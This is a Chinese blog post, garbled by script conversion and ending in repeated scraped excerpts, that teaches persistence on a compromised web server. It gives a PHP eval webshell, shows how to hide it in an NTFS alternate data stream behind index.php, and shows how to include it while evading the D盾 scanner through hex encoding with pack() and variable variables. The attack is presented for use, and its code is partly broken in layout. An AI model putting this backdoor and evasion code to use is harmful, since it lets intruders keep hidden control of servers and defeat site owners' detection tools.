web端許可權維持 利用ADS隱藏webshell

2022-02-20 21:13:16 字數 1754 閱讀 8824

未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。

關於ads的介紹,就不再闡述,詳見尾部參考資料。

php 一句話木馬:<?php @eval($_post['chopper']);?>,當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運算,函式等,各種變種。。。

製作步驟一:建立ads隱藏檔案

在伺服器上echo乙個資料流檔案進去,比如index.php是網頁正常檔案,我們可以這樣子搞:  

這樣子就生成了乙個不可見的shell hidden.jpg,常規的檔案管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。   

問題1:如何檢視index.php:hidden.jpg內容呢?

進入檔案所在目錄,notepad index.php:hidden.jpg    或者 dir /r

問題2:如何刪除index.php:hidden.jpg?

直接刪除index.php即可

製作步驟二:檔案包含

乙個正常檔案裡把這個ads檔案include進去,<?php include(『index.php:hidden.jpg』)?>,這樣子就可以正常解析我們的一句話了。

但是卻非常容易被webshell查殺工具查到,看到可疑引用的檔名,分分鐘出局了。

製作步驟三:如何繞過檢測

這邊要解決的是include函式,如何讓它檢測不出來有可疑引用檔案呢?

在某次應急響應事件中,獲取到一段**,這裡拿來改造一下。**如下:

<?php 

@include(pack('h*

','xx

'));

?>

php pack() 函式 函式介紹:

將index.php:hidden.jpg進行hex編碼

<?php @include(pack('h*

','696e6465782e7068703a68696464656e2e6a7067

'));?>

再次用d盾_web查殺進行掃瞄,還是被查到了。

進一步利用php 可變變數進行二次轉換,最後得到繞過d盾掃瞄的姿勢如下:

<?php 

$a="

696e6465782e7068703

"."a68696464656e2e6a7067";

$b="a"

;include(pack('h*

',$$b))

?>

繞過d盾_web查殺如圖:

許可權維持,也是一門很重要的課題,熟悉各種常見的後門技術,並懂得如何進行安全防禦。

web端許可權維持 利用ADS隱藏webshell

未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...

web端許可權維持 利用ADS隱藏webshell

未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...

web端許可權維持 利用ADS隱藏webshell

未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...